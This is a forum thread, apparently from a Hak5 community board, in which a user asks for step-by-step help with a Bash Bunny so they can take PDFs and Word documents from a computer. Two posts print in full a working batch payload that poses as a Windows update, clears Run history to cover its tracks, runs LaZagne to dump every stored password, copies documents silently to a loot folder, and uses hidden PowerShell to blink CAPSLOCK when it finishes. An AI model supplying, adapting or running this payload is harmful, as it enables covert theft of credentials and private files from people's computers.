linkhak

Hello Guys!

I've just received my Bash Bunny and need some Help.

I've updated it already and want to use the Document Exfiltration.

Can someone explain it step by step, what I've to do?

I want to exfiltrate PDFs and .docx from a computer and/or from a USB stick plugged in a computer.

Is this possible?

Please HELP

It's a lot easier if you learn the steps yourself , there are many places full of resources YouTube search bash bunny introduction

github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator

Edit e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

The e. C MD file can be edited near the bottom to copy what you want edit the X copy and just put your file extension

2 hours ago, m40295 said:

It's a lot easier if you learn the steps yourself , there are many places full of resources YouTube search bash bunny introduction

github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator

Edit e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

The e. C MD file can be edited near the bottom to copy what you want edit the X copy and just put your file extension

It’s a bit hard for me to understand Because I’m not a Native American speaker. 

Ive only found like 2/3 videos for exfiltration. 

It Would be very nice if you can explain it to me step by step. 

I would be veruz grateful:-)

Archived